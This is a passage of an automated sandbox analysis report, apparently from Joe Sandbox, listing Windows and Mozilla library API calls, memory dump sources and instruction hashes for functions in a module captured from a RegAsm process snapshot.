                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB6E3
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB70B
                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB71D
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C0EB61E), ref: 6C0EB73F
                                                                                      • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB760
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB79A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1394714614-0
                                                                                      • Opcode ID: e0dc4c8c9a417651578223562af7852d364c3067a648c80f996bf6b32abbdaa3
                                                                                      • Instruction ID: f96ef19e8c98489aa7405cf97e6ab9a760938a2aa80c60f49798a661b18716f8
                                                                                      • Opcode Fuzzy Hash: e0dc4c8c9a417651578223562af7852d364c3067a648c80f996bf6b32abbdaa3
                                                                                      • Instruction Fuzzy Hash: 9D41D6B2D002158FCB14DF69DC807AEB7F9FB48324F250669E865E7780E731AA148BD5
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(6C165104), ref: 6C0EEFAC
                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C0EEFD7
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0EEFEC
                                                                                      • free.MOZGLUE(?), ref: 6C0EF00C
                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C0EF02E
                                                                                      • memcpy.VCRUNTIME140(00000000,?), ref: 6C0EF041
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0EF065
                                                                                      • moz_xmalloc.MOZGLUE ref: 6C0EF072
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                      • String ID:
                                                                                      • API String ID: 1148890222-0
                                                                                      • Opcode ID: 57ea4fb727335d39f119c7cec5631e35b57a8f0dc243436635135de0fe2ef3ad
                                                                                      • Instruction ID: 1f71fce984b6670904693d1dfb4da86cb7b9dfb2fd2199efb2392df6061b6f4e
                                                                                      • Opcode Fuzzy Hash: 57ea4fb727335d39f119c7cec5631e35b57a8f0dc243436635135de0fe2ef3ad
                                                                                      • Instruction Fuzzy Hash: A741E9B1E001159FCB08CF68D8916AE77A9FF88314B244628E825D7794EB71E915C7E1
                                                                                      APIs
                                                                                      • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C15B5B9
                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C15B5C5
                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C15B5DA
                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C15B5F4
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C15B605
                                                                                      • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C15B61F
                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C15B631
                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C15B655
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                      • String ID:
                                                                                      • API String ID: 1276798925-0
                                                                                      • Opcode ID: 962d210efe768a926e59f9b9f5c6b9da054f401139e3c3a4fd2ac8e1163ba276
                                                                                      • Instruction ID: d39aa0309f4624a425478f359c45c374eea1b39b9b6200429ae8f78ca5409347
                                                                                      • Opcode Fuzzy Hash: 962d210efe768a926e59f9b9f5c6b9da054f401139e3c3a4fd2ac8e1163ba276
                                                                                      • Instruction Fuzzy Hash: 0331E9B2B00214CBCF00DF6AC8586BEB7B5FF8A324B510525E921D7740DB34A916DF91
                                                                                      APIs
                                                                                      • free.MOZGLUE(?,?,?,6C147ABE), ref: 6C0F985B
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C147ABE), ref: 6C0F98A8
                                                                                      • moz_xmalloc.MOZGLUE(00000020), ref: 6C0F9909
                                                                                      • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C0F9918
                                                                                      • free.MOZGLUE(?), ref: 6C0F9975
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1281542009-0
                                                                                      • Opcode ID: 669ab53498ffd33ec6cb83979f3a8c56e15df0988d228419cb2f86697ac3cea5
                                                                                      • Instruction ID: 3c4adfc25ccc15ca4a9b388c2dc299749aaf8ef0ea9fdd9b763aaaba27446b43
                                                                                      • Opcode Fuzzy Hash: 669ab53498ffd33ec6cb83979f3a8c56e15df0988d228419cb2f86697ac3cea5
                                                                                      • Instruction Fuzzy Hash: A0716A746047058FC725CF2CC480A56B7F1FF4A324B654AADDC6A8BBA0D771B886CB91
                                                                                      APIs
                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C13CC83,?,?,?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C0FB7E6
                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C13CC83,?,?,?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C0FB80C
                                                                                      • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C13CC83,?,?,?,?,?,?,?,?,?,6C13BCAE), ref: 6C0FB88E
                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C13CC83,?,?,?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C0FB896
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                      • String ID:
                                                                                      • API String ID: 922945588-0
                                                                                      • Opcode ID: 79b8b062562bf04611786445434eb490f890f3fc53dfa4655cc89bd21f6ec5a6
                                                                                      • Instruction ID: 0228fcf6260cfcdf69e9d22637379e0c9bed9765839fd31a06705f2256a7545b
                                                                                      • Opcode Fuzzy Hash: 79b8b062562bf04611786445434eb490f890f3fc53dfa4655cc89bd21f6ec5a6
                                                                                      • Instruction Fuzzy Hash: 165168357006048FCB25DF59C584A7ABBF5FF89318B69855DE9AA8B351C731E842CF80
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124B48
                                                                                      • free.MOZGLUE(?,?,?,80000000,?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124B7F
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124B94
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124BBC
                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C124AB7,?,6C0E43CF,?,6C0E42D2), ref: 6C124BEE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                                                      • String ID: pid:
                                                                                      • API String ID: 1916652239-3403741246
                                                                                      • Opcode ID: daf7bd840a1e7acfc18f342b99de02cbf9da9bcd1d1c6dd53f4d2a8948dcd437
                                                                                      • Instruction ID: 6f3942ffa229b4b8c9369fdd78e00c5c4e8d31159f0a80da8cbfa9d24bfd8b2f
                                                                                      • Opcode Fuzzy Hash: daf7bd840a1e7acfc18f342b99de02cbf9da9bcd1d1c6dd53f4d2a8948dcd437
                                                                                      • Instruction Fuzzy Hash: 27411775B002198BCB14CFBCDC846AFBBF9EF85224B144638E865DB781D7349958C7A1
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C131D0F
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,6C131BE3,?,?,6C131D96,00000000), ref: 6C131D18
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,6C131BE3,?,?,6C131D96,00000000), ref: 6C131D4C
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C131DB7
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C131DC0
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C131DDA
                                                                                        • Part of subcall function 6C131EF0: GetCurrentThreadId.KERNEL32 ref: 6C131F03
                                                                                        • Part of subcall function 6C131EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C131DF2,00000000,00000000), ref: 6C131F0C
                                                                                        • Part of subcall function 6C131EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C131F20
                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C131DF4
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1880959753-0
                                                                                      • Opcode ID: 20cfeb86093705445359db318b2f5c2e24adb2626d009e6ddc9512f3b1dcdfdb
                                                                                      • Instruction ID: 5420aed7b68454dd73c186b89badd7b5d1c75a4697b175183c902493393a07e6
                                                                                      • Opcode Fuzzy Hash: 20cfeb86093705445359db318b2f5c2e24adb2626d009e6ddc9512f3b1dcdfdb
                                                                                      • Instruction Fuzzy Hash: 5E4157B56007109FCB10DF29C489B66BBF9FB89358F20442EE99A87B41CB71F854CB91
                                                                                      APIs
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16E220,?), ref: 6C14BC2D
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16E220), ref: 6C14BC42
                                                                                      • RtlFreeHeap.NTDLL ref: 6C14BC82
                                                                                      • RtlFreeUnicodeString.NTDLL(6C16E210), ref: 6C14BC91
                                                                                      • RtlFreeUnicodeString.NTDLL(6C16E208), ref: 6C14BCA3
                                                                                      • RtlFreeHeap.NTDLL ref: 6C14BCD2
                                                                                      • free.MOZGLUE(?), ref: 6C14BCD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                      • String ID:
                                                                                      • API String ID: 3047341122-0
                                                                                      • Opcode ID: 2b1f4d76a361f7862698b7be5cf3fd04052ad290f774c10e9f33760f9c64073d
                                                                                      • Instruction ID: 728a2ceb8847add9a75d694eb01cd470bdc4276f8f52afe1f5e10d97c941052f
                                                                                      • Opcode Fuzzy Hash: 2b1f4d76a361f7862698b7be5cf3fd04052ad290f774c10e9f33760f9c64073d
                                                                                      • Instruction Fuzzy Hash: 0521BFB2600B04CFE7209F0ACCC0BAAB7E9BF45718F55C469E9595BA10CB75E846CBD0
                                                                                      APIs
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16E220,?,?,?,?,6C0F3899,?), ref: 6C0F38B2
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16E220,?,?,?,6C0F3899,?), ref: 6C0F38C3
                                                                                      • free.MOZGLUE(00000000,?,00000000,0000002C,?,?,?,6C0F3899,?), ref: 6C0F38F1
                                                                                      • RtlFreeHeap.NTDLL ref: 6C0F3920
                                                                                      • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C0F3899,?), ref: 6C0F392F
                                                                                      • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C0F3899,?), ref: 6C0F3943
                                                                                      • RtlFreeHeap.NTDLL ref: 6C0F396E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                      • String ID:
                                                                                      • API String ID: 3047341122-0
                                                                                      • Opcode ID: 1543747391ba74227167966910c08eb1a580084b2b417fb2c26a528c274ee13e
                                                                                      • Instruction ID: 49e5da32721fe1c1987897b2364f2cf1dfff28b70f497b2945f7bcb9163e4601
                                                                                      • Opcode Fuzzy Hash: 1543747391ba74227167966910c08eb1a580084b2b417fb2c26a528c274ee13e
                                                                                      • Instruction Fuzzy Hash: 5921F372600714DFD710DF29C880B96B7E9EF49328F158429ED6A97B10CB34E886CB91
                                                                                      APIs
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1284F3
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12850A
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12851E
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12855B
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12856F
                                                                                      • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1285AC
                                                                                        • Part of subcall function 6C127670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C1285B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C12767F
                                                                                        • Part of subcall function 6C127670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C1285B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C127693
                                                                                        • Part of subcall function 6C127670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C1285B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1276A7
                                                                                      • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1285B2
                                                                                        • Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
                                                                                        • Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
                                                                                        • Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                      • String ID:
                                                                                      • API String ID: 2666944752-0
                                                                                      • Opcode ID: d765ba71faa40bad2ef2f49e306e8fdfedda5b7c395702df543258d482be6232
                                                                                      • Instruction ID: 4453f382ed12fe4c588c53796c81481a6e905c912789b3a4038e85fb651acc01
                                                                                      • Opcode Fuzzy Hash: d765ba71faa40bad2ef2f49e306e8fdfedda5b7c395702df543258d482be6232
                                                                                      • Instruction Fuzzy Hash: C62191792007418FEB14DB69C888A6AB7B5BF5430CF14492DE99BC3B41DB39F988CB51
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0F1699
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F16CB
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F16D7
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F16DE
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F16E5
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F16EC
                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0F16F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                      • String ID:
                                                                                      • API String ID: 375572348-0
                                                                                      • Opcode ID: 0285b872ddf4eee12848439fddb4aeb8666dd0f0dc8c593b72a3636169ace72e
                                                                                      • Instruction ID: 8af0cd5aaed627e2100105ea63eb7fb002ee7953bacf52c72068ca37647ae6ec
                                                                                      • Opcode Fuzzy Hash: 0285b872ddf4eee12848439fddb4aeb8666dd0f0dc8c593b72a3636169ace72e
                                                                                      • Instruction Fuzzy Hash: 4721D2F07402086BEB106A658C85FBFB3BCEF9A708F404528F6459B6C0C6749E55CBA1
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D1EC
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D1F5
                                                                                        • Part of subcall function 6C13AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C13AE20
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D211
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D217
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D226
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D279
                                                                                      • free.MOZGLUE(?), ref: 6C13D2B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                      • String ID:
                                                                                      • API String ID: 3049780610-0
                                                                                      • Opcode ID: ed386dee3c67544784fd805b439f0ab064acda39e5ecaad58d6b5b6cb29a160a
                                                                                      • Instruction ID: 516a2c85718e1863d63309a87c5d24a4455fda256414d2505b65b653d126b654
                                                                                      • Opcode Fuzzy Hash: ed386dee3c67544784fd805b439f0ab064acda39e5ecaad58d6b5b6cb29a160a
                                                                                      • Instruction Fuzzy Hash: E1217E71704305DBCB05DF25C488AAEB7B5FF8A328F10462DE55A8B340DB34A909DB96
                                                                                      APIs
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F619
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C12F598), ref: 6C12F621
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F637
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000,?,6C12F598), ref: 6C12F645
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000,?,6C12F598), ref: 6C12F663
                                                                                      Strings
                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C12F62A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
